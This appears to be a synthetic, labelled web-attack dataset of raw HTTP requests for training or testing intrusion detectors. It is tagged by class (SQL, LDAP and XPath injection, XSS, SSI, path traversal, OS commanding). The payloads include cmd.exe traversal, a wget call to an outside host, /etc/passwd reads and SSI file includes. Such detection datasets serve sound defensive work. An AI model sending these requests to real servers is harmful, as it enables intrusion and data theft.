GET /rdtht6.htm?BacceptLIfQHQ=sS%7Ce&eissn=e1ccrenydNJoei&tkogS=oZbm&drss9=vwaleni%27%5D++++%7C+++++P+%7C+++++%2F%2Fuser%5B++name%2Ftext%28%29++++%3D+++%27lnrf&madnNlan1vjCk=aio+&esNnoatduhot=07309&ubpwmae2i=spst&ks=csuO&uwalufeTesoT=5WCI8&Pt4Iedhrqi=ofStP6RPT HTTP/1.1
Host: 41.151.213.177
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: utf-8, isiri-3342, cp-932
Accept-Encoding: gzip;q=0.3
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: zjh=140705
Cookie2: $Version="976"
Date: Wed, 09 Feb 05 10:41:59 UTC
ETag: W/"5tbEgKV-1j@SgzGrK3k"
Expect: fbtsncr
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Fri, 06 Feb 09 22:26:13 UTC
If-Unmodified-Since: Sat, 12 Aug 06 22:39:28 UTC
If-Match: "nfxaCVq0fvwA.-m"
If-None-Match: "tdNluFRw5mCSu7GRSx"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: Basic aWJVZnRpOmVmaEU=
Range: -82,-22
Referer: http://iu7ee.com/tnchwsnt/tsNu6.png
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.8 (X11; U; Open BSD i586 4.7; 3i-EM; rv:5.1.6) Gecko/53786795
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: HTTP/7.1 140.253.252.223
Transfer-Encoding: identity
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35691
Start - Id: 47333
class: XSS
GET /Tet7AsS4ehaaUuebtLo/eeae/uoreeavohrtbZdnja2/l7fne9pWpElO00G3Fl.png?fHTAeUFmHn=exec+havingEs&Y5QvOCiByY=2ts+++onload%3Djavascript%3Aalert++++%28vqiRtn.nEl%29 HTTP/1.0
Host: 78.32.145.72
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: eimaSa-d, FrIao-h, renc-bcM, gs-8bey2Oit
Cache-Control: no-store
Client-ip: 88.199.53.236
Cookie: w1gt7itt=oirb;bsenao=c33UX;naylb=tRaudd'aenh
Cookie2: $Version="6"
Date: Wed, 02 Apr 08 04:31:55 UTC
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "4LjPEMD1PLRv7tVPonY"
If-None-Match: *
If-Range: Sun, 05 Oct 08 03:52:03 GMT
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -827060,69-,229-399617
Referer: /idettuo/toletWho/ogonE/anS0oen/1ooOdacL.jpeg
TE: deflate;q=0.0,trailers
Trailer: If-Match
User-Agent: Mozilla/9.0 (X11; U; Solaris 2.7; yd-ds; rv:6.9.7) Gecko/23482318
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6004x311
Via: 3.3 127.88.135.65, zo1c/0.5 207.196.196.203
Transfer-Encoding: gzip
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 9556709802394
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47333
Start - Id: 44437
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 225.79.50.232:80
Connection: close
Accept: application/*;q=0.0, audio/*;q=0.0, image/jpeg
Accept-Charset: iso-8859-5;q=0.6, cp-936, utf-8;q=0.3
Accept-Encoding: 
Accept-Language: 2aisjytp-Ot;q=0.9
Cache-Control: bsordeo=ts7
Client-ip: 206.122.45.166
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Tue, 10 May 05 13:52:42 CET
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Sun, 12 Feb 06 09:15:28 UTC
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 1.5
Pragma: orIohotr=epuLb
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: NTLM b2VvbG5zT2dlZlJBaDBRQ3RnZW9BcmZmbnlsaDZoOXRlaDRyd3Nod3NwMWk=
Range: 6-02287,72753-
Referer: http://www.HGtnime.ch/ewtndile.mpeg
TE: trailers,deflate,trailers
Trailer: From
User-Agent: Mozilla/8.1 (compatible; MSIE 0.8; Win 9x; ecOigEbai0)
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: compress
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44437
Start - Id: 35179
class: SqlInjection
GET /kueaTeiknn/rEC6NfWI/yl/8rh6aoon/yHF/ydVKQI5i_9@LAYf00zL.nsf?AvG1=sse&tAsNlaoee=%27++OR+++++%27MA%27+%3D+++++%27eBta%27%2B%27dnprisS%27&sttmCvotae2=t5jes HTTP/1.0
Host: 124.44.151.13:99
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: lmgnhanC-ruymda
Cache-Control: only-if-cached
Client-ip: 190.117.195.127
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="835"
Date: Tue, 12 Sep 06 17:48:52 UTC
ETag: "03P6MG1v10dHj@5U"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Wed, 17 Sep 08 16:54:06 UTC
If-Unmodified-Since: Tue, 23 Jun 09 02:12:31 UTC
If-Match: "011Lc6Xagygdb0fvLF"
If-None-Match: "af2RR3WxHISuLZUy"
If-Range: "pu.YBhncA2mIlAb"
Max-Forwards: 5
MIME-Version: 2.3
Pragma: p2ziuc='dr'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Basic c2FyYWJMOmVwRXVpdA==
Range: 5131-,-0
Referer: http://www.Wlnzpc.net/iaretoj/essa/jins.asp
TE: trailers
Trailer: From
User-Agent: iWnebl (az_n.Tw8VS; tcCH5ejK-; cZ0IDJj)
UA-CPU: StrongARM
UA-Disp: 571,0582,16
Via: HTTP/6.8 50.90.140.157:07285, 5.3 www.msso.html:526
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35179
Start - Id: 37421
class: LdapInjection
GET /mnrisoO/rw-YRqwl3gjo98uM7/eBH0scriptz/PY1documentfGvQ2_/jbtyi7e5h/sndasjro9Npevnul1s/i_o8snQ.dll?AYKhtpassexecm7ZK7_H=97931291&ereqko=yu-%40yYc0Ev&Vo=dNI8Dey&daub2nadfq8sT=ei7xp_&rOoEhngpdRZoUse=2313&siinc6tK=209371 HTTP/1.1
Host: 126.137.37.136
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1254, iso-8859-3, koi8-r, shift_jis;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: Nyaesji=sNdSac9e
Client-ip: 66.200.163.45
Cookie: Iotkim=iph h d2t;n9=727960879;YrOoptuzX=Ch-rceRobjectallhl;location85v-=zet)(&(objectClass  =   hila*)
Cookie2: $Version="5"
Date: Thu, 03 Jul 08 01:31:07 CET
ETag: W/"iSE2h8._tv7xs8QsTBF"
Expect: pjThdhds
From: eda9Oyew@bfisXrie.cz
If-Modified-Since: Sun, 24 Oct 04 07:54:22 CET
If-Unmodified-Since: Wed, 10 Mar 10 21:37:32 CET
If-Match: "8-@tgH9JqLQdB0r2lD"
If-None-Match: "HMIGeZJILF4WSMd"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: aeo57j 1iate=ahmbRee
Authorization: denant eaRsbsi=Smcz
Range: -84
Referer: /tereoetc/aets5O/aEsX.asmx
TE: gzip;q=0.5,chunked
Trailer: Via
User-Agent: tmash/1.2.4.8.7
UA-CPU: Sparc
UA-Disp: 952,5448,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 359x5733
Via: 9.7 75.51.114.143, 9.6 62.17.174.64
Transfer-Encoding: deflate
Upgrade: ere/7.9, een/7.9, i8ed/9.2, 1Dq/4.6
Warning: 235 143.206.161.131:00127 "yjo6bijuuoe" "Mon, 10 Nov 08 02:40:27 GMT"
X-Forwarded-For: 44.141.186.180
X-Serial-Number: 1007301637
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37421
Start - Id: 35393
class: SqlInjection
GET /nudvk/i0RvRp8fnode2tQmC/oAhleueibdeshhrQus/cau4IPJ@bCmGA3yC/qtsitgAooo/a9Ow6u.css?zetenr=559040&w2l3wrS3jiha=Aunionxr&PragbatAmnr0el=Oseiydcensqev&fhRLtmthzauiehd=onasamhemksw+&fldsswsfbr72zcf=0640&momi35dhuwmlxh=6967015&QupdateI_=%27+++++OR++%27ihots6d%27+++++BETWEEN+++%27R%27+++++AND+++%27T&ioaa3=gr+%3Fnwr HTTP/1.0
Host: www.p0nd5nhtu9.it
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.3, utf-8, iso-8859-8-i;q=0.7, euc-jp;q=0.9, shift_jis;q=0.6
Accept-Encoding: *
Accept-Language: Pai3s-rosdohf;q=0.7, phsa-nsyae;q=0.9, eae-kosaaxde;q=0.3, ig-ikTaork
Cache-Control: only-if-cached
Client-ip: 42.209.93.236
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="6"
Date: Sat, 21 Feb 04 04:07:21 GMT
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: tqnkotl=tntt5;qeotah=wGst
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Thu, 30 Mar 06 02:30:26 CET
If-Unmodified-Since: Thu, 04 Dec 08 24:23:41 GMT
If-Match: "fRJc2.6RTWccVquj"
If-None-Match: "ohWC_3App6WkEvSDwF"
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: NTLM ZHVhZWkxZUFlTHRsbnBjUmJEdGRkYm5lUnI0bUNseWw4anM=
Range: 24492-281270
Referer: http://www.uesli4ha.net/si2en/oiStahe/cua7xrva/rtgspkT.php
TE: gzip,trailers,gzip;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/8.6 (compatible; Y5hei; Win98; nlictdut; dwbB; llijnksd6)
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: identity
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35393
Start - Id: 40748
class: SSI
GET /geSr/4ehcdqvaq5/aaeCinmdgyl1ltneeuAe/k2KEkg1N/BM4DIxml/9GYlbz0jVOYMn/lod/trgUTH/qtpzek2.js?iEnvnitwhhtsh=92&slIdhbeflAemd=nva&dnull_bXXmPPIQI=lN_OnkNA&ee=1N%2B5&ti3hwijmae=g&TbtCneecm=70315&senetkm=70&toaesr=4322285&isin9sotjtmeta=%5D%25dxnc&inefcioo=771&ni=q%25qq HTTP/1.0
Host: 255.202.207.58:9
Connection: close
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sitxre-no;q=0.0, ojubKrue-dagdb, Nra-ioah;q=0.8
Client-ip: 254.179.17.236
Cookie: rAloeb=ec-K6qAgyE;izoogU=<!--    #odbc  connect="H7iuh,ant,snN"  statement="select  *   from   lq"-->;AYvH=275092;anchkt=mcutIDF.zd3;cautoexeccmdR7exec9=7767;nohni=60193
Cookie2: $Version="96"
Date: Wed, 26 Jul 06 24:56:30 UTC
Expect: 100-continue
If-Unmodified-Since: Mon, 05 Mar 07 15:13:13 CET
If-None-Match: "ihzqOmgnaPYF49sT-JHF"
Pragma: elh=a2e
Referer: /fsl1j/soos/Haqt/3bshe.asp
TE: trailers
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 7.8; nz-68; rv:9.0.4) Gecko/77700987
Via: HTTP/5.5 157.132.100.224, 5.8 50.183.229.227, UgxtSi/9.8 www.niryijr.html
Transfer-Encoding: gzip

null

End - Id: 40748
Start - Id: 48916
class: XPathInjection
GET /nt/gKbNZgY/sbxalisiTnm/ae/uf/uM-8sKx7V49LVUj/%u0y-x/et/rh80/LnodeRXZ-AnI4jVu/Qg2zncgqDzVE.X/teonrducuashsseiosv.png?rq=umsyce+woroua+&senltot=b2dk%27+or+++t2j%2FS%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D382%5D++++or++%27Nhd%27++%3D%27&eiaCze=5378000036&beoI4iA=s0&sGsienn=t6V8%40ZkBk&Hefhenecgei=87&aaenEzdo=tfX&_AE5wp-1QmochaULZs=s%40j%403GP9nGw&Wf=rgT9fteGdse&lklja=Tdeta8gzcse6rhems&telb=9&zYsdO9czk1dbDeo=vzuOIp&87RmnxsuetIeoi=%3Fei&hhtt=telnete7nthformwsjepasswdt%2F%3Fohaving8I&ieehe4vo=5532810318 HTTP/1.0
Host: www.esglsy8.net
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.7, iso-8859-7
Accept-Encoding: 
Accept-Language: pdeuieg6-ao5, rassno8l-aeh;q=0.6, u-s;q=0.9, 7e7ilaEs-getyfwaf, e6Yotr-dcp
Cache-Control: no-cache
Client-ip: 33.184.179.137
Cookie: iei=8214;tfsmA1irsHp=2j;bm1srzi2issen=heT
Cookie2: $Version="504"
Date: Mon, 22 May 06 22:16:54 CET
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: 100-continue
From: nui8@hgERemx.net
If-Modified-Since: Fri, 06 Aug 04 01:19:57 UTC
If-Unmodified-Since: Mon, 08 Jan 07 18:50:19 CET
If-Match: "Aw-S3Kv7aC8-XpmG"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: *
Max-Forwards: 2362
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: eavt tn6ctr=enrnic4r
Range: 87-22
Referer: http://www.gsst.org/oxMpe.php
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/9.9 (X11; U; SunOS sun4u 3.9; ue-im; rv:3.9.5) Gecko/37039157
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 508x349
Via: 7.8 www.dsrsom5.js:8, 0.0 www.cEwfnnr.htm, 1.7 229.46.126.177
Transfer-Encoding: compress
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 467543929806
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48916
Start - Id: 48324
class: XPathInjection
GET /e8NftlDeasg/eAIdd/sgfU/ac/es7gLsxw8c24o23es0k/eUXsId.4/rasnusb1i1ipiai0lcr/6lhenwEernurt1nhw/c9tobhrewner2lsio/nSw.html?_C@wvwindow.openVall9Z=+&tEahllvco9tentd=c%5Cuohome%3Bs+%3Dservicesmallmq%40hro HTTP/1.1
Host: 10.255.174.49
Connection: close
Accept: audio/x-wav;q=0.8, video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 6822   or   1<  acr/twp/oajKoj/child::text()[position()=72]  or 17515='] | /* | /foo[bar='
Cache-Control: max-stale=342
Client-ip: 29.211.81.81
Cookie: tgti=219288;Euaacnojm=i
Cookie2: $Version="5"
Date: Fri, 08 Jul 05 05:40:27 UTC
ETag: W/"683Tkn1roCDkCKGYEt"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 25 Mar 04 19:12:12 GMT
If-Unmodified-Since: Mon, 13 Dec 04 06:14:42 CET
If-Match: *
If-None-Match: "BV0Gx3O0DHak6g7wa"
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 0688
MIME-Version: 6.0
Pragma: ucsg='naha'
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM cmhmYmtpRTZ5aEdkeTFyN3BlWENoZmNEY2xuT290dXRuaXZnTGxhUA==
Range: 508-6,8-
Referer: /nralOfp/arteu/mtdatt.wav
TE: trailers,deflate,trailers
Trailer: If-Modified-Since
User-Agent: imnc1rInh
UA-Disp: 296,6544,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: 0.4 159.100.180.107
Transfer-Encoding: okel; srihueh3=s5ohaecf
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 515 www.ym4eeqof.jpg:0 "8RqeaelobLhe" "Thu, 13 Nov 08 14:12:40 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 60251913141414818298
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48324
Start - Id: 46164
class: PathTransversal
GET /cgeet/7eb/scouUCMagg/bu1L11Y@cZTF48D/ohiXvpnshmriFtst/tjsJ-.S95JRbn53bY.gb/ickUSndvzhn/coqsbong1.tiff?eahWlNyaa=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: www.Jiyzsecald.cz:8
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: *
Accept-Language: naug8-tnil, tg1e-m, 7t6avrrr-fyJbjTs, w-ifntfs;q=0.7, axai-rjsd;q=0.2
Cache-Control: max-stale
Client-ip: 172.17.95.67
Cookie: aeszsnos=(6rincludes;1ucNeesepener=aaew ;ihnz=63470317;aensurc=20;ro9a=nSac;3kuMt7lOd=emjU
Cookie2: $Version="276"
Date: Mon, 26 Feb 07 16:26:28 CET
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: itSee@io7o.gov
If-Modified-Since: Fri, 26 Sep 08 18:24:30 UTC
If-Unmodified-Since: Mon, 09 May 05 24:55:06 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 04 02:32:00 UTC
Max-Forwards: 2
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: slso ala9=euegghy
Authorization: hS5tbn eneaviiR=hotohIe
Range: -51066
Referer: /exuiaq/eYs5/TTrcaRau/e0hoi/ahiniai.pdf
TE: trailers,gzip,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 7.7; nb-eu; rv:9.2.3) Gecko/18755957
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 6.9 63.96.226.125
Transfer-Encoding: styatH
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46164
Start - Id: 44414
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 160.50.25.95
Connection: close
Accept: application/*;q=0.1, audio/*;q=0.8
Accept-Charset: x-mac-greek, windows-1255, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: Ee-7ekooe;q=0.3, 4bo-uM, Lhebuius-8;q=0.9, herrz-tR0oeaSI;q=0.2, eet-5
Cache-Control: y=tfvicem
Client-ip: 139.10.43.8
Cookie: ssbmna=5
Cookie2: $Version="45"
Date: Tue, 15 Jan 08 22:52:20 UTC
ETag: W/"V.NIwSOWHFxujXg-iF_9"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: "2uzo5FNbXbBlmlGRD"
If-None-Match: "Ox7366H@R4rKw0BBBa7"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 4616
MIME-Version: 6.2
Pragma: esGSwi=iteHEWe
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://www.hrir.ch/haeTns/ky6e/73ehu2s/ufeemze.tar.gz
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: attOd4 (lqMCZ-; eurJ4MP; 1TfG9JmU; 5afuavLrkg)
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6396x837
Via: ljf/1.1 85.131.140.65, HTTP/6.1 www.8oro.gif
Transfer-Encoding: esAcdk; saqnNne=e6yaptpo
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44414
Start - Id: 36733
class: OsCommanding
GET /2ohfedepei0e/qraog7qdnwtstio/mbsesy7/terera7h/wteanrlatsezsalhv/y8upj1tu0eks7NC.mspx?hoeuiacet1g=%22+++%3B+++++%2Fusr%2Fbin%2Fwget+++++www.ngitisento.com%2Fma+%3B HTTP/1.1
Host: www.3hbae8e.it
Connection: keep-alive
Accept: image/png, text/html;q=0.1
Accept-Charset: isiri-3342;q=0.0, iso-8859-7;q=0.1, ks_c_5601-1987, iso-8859-7
Accept-Encoding: *;q=0.7
Accept-Language: em-ostrtec, eR8-r;q=0.6, uc-oohye;q=0.1, us-sE
Cache-Control: max-age=4844
Client-ip: 103.144.20.186
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="7"
Date: Tue, 21 Nov 06 22:17:20 UTC
ETag: "FaWmKnGLIj3GuDEP9"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 26 Aug 06 19:08:23 GMT
If-Unmodified-Since: Sat, 02 Aug 08 17:21:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Dec 09 09:36:33 GMT
Max-Forwards: 0987
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: arbdmm d5imtsen=htu1tR
Range: -47510,582-0
Referer: /sttHds/wodi/ldgo/tgea.cgi
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/9.2 (compatible; Konqueror/6.9; Mac OS X; itsgnh; elgltwf; rgdbcdhu)
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: HTTP/5.1 www.exeEe.html
Transfer-Encoding: clis
Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 156 39.92.206.178 "handies1bawt" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36733
Start - Id: 40550
class: SSI
GET /osnezeT8h6sek/ikSdOckl3W@bPPAW/sSw.shtml?yiaifadubunagw=%3C%21--++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&etrhs8yy=qz2wWlxb&ncbtayTs=Rdsu&yhnnyseon0fi9h=erTf7h2fJVYc&suuHTvprtta=949524&vbscriptrDaD=lyhi&0roftgfibvlzb=65961&bnli=s%27dt4rioN&woD=+5n HTTP/1.1
Host: www.Stnsn5.st
Connection: belseE
Accept: text/*, application/zip;q=0.6, text/xml;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: toilN-mw;q=0.3, u0-S;q=0.2, ritelfAc-vix;q=0.6
Cache-Control: only-if-cached
Client-ip: 240.170.17.104
Cookie: bjp=ddssftalt|t'iDi1jt
Cookie2: $Version="45"
Date: Tue, 25 Aug 09 01:37:11 CET
ETag: "shj6cd5gNPyMBr-"
Expect: 100-continue
From: dllx8s1@F9aYw68.biz
If-Modified-Since: Tue, 10 Aug 04 01:40:32 CET
If-Unmodified-Since: Mon, 26 Feb 07 03:32:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 371
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: Basic OWJlYWVhOnVpc2Q=
Range: 85-,28138-
Referer: http://www.etuslits.it/gmhseWsf/nhbcma.php
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: hogfa9an (plEb9wL; wmCqNNO; s3Gtuaw0l; t17jUH; tBJO@QSD)
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0457x8183
Via: 3.5 www.de66.jpeg
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 851441639
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40550
Start - Id: 42657
class: SqlInjection
GET /bYRDDi3CvL4rS.aspx?6rrxtteHneqi=mntyW&okufqs8yei=018&hesWrnfnr=bh%29No&tencat8=%3C+ttpbgreyI%3Exyi&8YrviI8jy=5fa&oSiel=4&HUEb5=and+++0%3C%3E%28select+count%28*%29+++++from+++hszst+++where++iL%3C%3E%29&ADqaPuw=96494&iJ=O&a6treauNHh=295785&rx=qtaceoepf4koooo HTTP/1.1
Host: 249.15.76.139:28879
Connection: stwtnurr
Accept: text/html;q=0.9, audio/basic;q=0.5, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.9, identity;q=0.7, gzip, identity;q=0.2
Accept-Language: ariysatg-enr7esti, y5iisop-1Ye;q=0.2
Cache-Control: max-age=9
Client-ip: 146.94.72.186
Cookie: qq1ha2ftaaao=8229;z1EMR=i6OEP.2uc;ehO=9;rubdaonj9ojgp=ijaunsop~jttni
Cookie2: $Version="8"
Date: Tue, 28 Aug 07 24:48:23 GMT
ETag: "4mLrOeH.lXb5FlOLoPqM"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Fri, 25 Nov 05 18:30:32 CET
If-Unmodified-Since: Wed, 26 Jul 06 05:27:54 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 2
MIME-Version: 4.4
Pragma: ab5t='aektbUou'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: 339-5245,-077063
Referer: http://www.GSnislt.cz/slaeEset/ntdtpT/hhete/s2saAhi/twso0o8.pdf
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: eomcnltiz6evitee
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: deflate
